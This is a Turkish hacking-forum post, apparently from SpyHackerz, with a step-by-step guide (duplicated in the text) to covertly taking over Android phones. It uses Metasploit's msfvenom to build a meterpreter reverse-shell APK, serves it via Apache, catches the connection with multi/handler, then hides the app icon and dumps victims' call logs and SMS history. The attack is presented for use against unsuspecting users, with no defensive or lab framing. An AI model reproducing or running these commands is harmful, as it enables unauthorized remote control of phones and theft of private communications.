Çoğu android kullanıcısı antivirüs kullanmıyor. Biz de bu açıktan yararlanarak telefonlara rahatlıkla sızabiliriz.
Anlatıma geçelim;
ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı
ifconfig
eğer tool sisteminizde yüklü değilse
curl https://raw.githubusercontent.com/r...s/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
komutunu girerek yükleyebilirsiniz
ardından apkyı oluşturuyoruz
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk
ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin
masaüstünde apk dosyası oluşacak
ardından apache'yi başlatıyoruz
service apache2 start
şimdi metasploiti açıyoruz
msfconsole
payloada geçiyoruz ve exploiti belirliyoruz
set payload android/meterpreter/reverse_tcp
use exploit/multi/handler
seçeneklere giriyoruz
show options
ip adresini ve portu ayarlıyoruz
set LHOST 192.168.1.34
set LPORT 4444
exploiti başlatıyoruz
exploit
şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek
şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle
sessions i
sessions –i 3
şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz
help
hide_app_icon komutu ile uygulamayı gizleyerek başlayın
dump_calllog ile arama geçmişini tamamen çekebilirsiniz
dump_smslog ile sms geçmişini tamamen çekebilirsiniz
daha fazlası için orayı inceleyin
View hidden content is available for registered users!
Anlatıma geçelim;
ilk önce ip adresinizi öğrenin. kendi bilgisayarınızda yapıyorsanız local ip adresinizi kullanacaksınız. sunucuda yapıyorsanız sunucunun ip adresini kullanın.
not:local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı
ifconfig
eğer tool sisteminizde yüklü değilse
curl https://raw.githubusercontent.com/r...s/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
komutunu girerek yükleyebilirsiniz
ardından apkyı oluşturuyoruz
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk
ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin
masaüstünde apk dosyası oluşacak
ardından apache'yi başlatıyoruz
service apache2 start
View hidden content is available for registered users!
şimdi metasploiti açıyoruz
msfconsole
payloada geçiyoruz ve exploiti belirliyoruz
set payload android/meterpreter/reverse_tcp
use exploit/multi/handler
seçeneklere giriyoruz
show options
ip adresini ve portu ayarlıyoruz
set LHOST 192.168.1.34
set LPORT 4444
exploiti başlatıyoruz
exploit
şimdi oluşturduğunuz apkyı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek
şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle
sessions i
sessions –i 3
şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz
help
hide_app_icon komutu ile uygulamayı gizleyerek başlayın
dump_calllog ile arama geçmişini tamamen çekebilirsiniz
dump_smslog ile sms geçmişini tamamen çekebilirsiniz
daha fazlası için orayı inceleyin
View hidden content is available for registered users!
Moderatörün son düzenlenenleri:
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl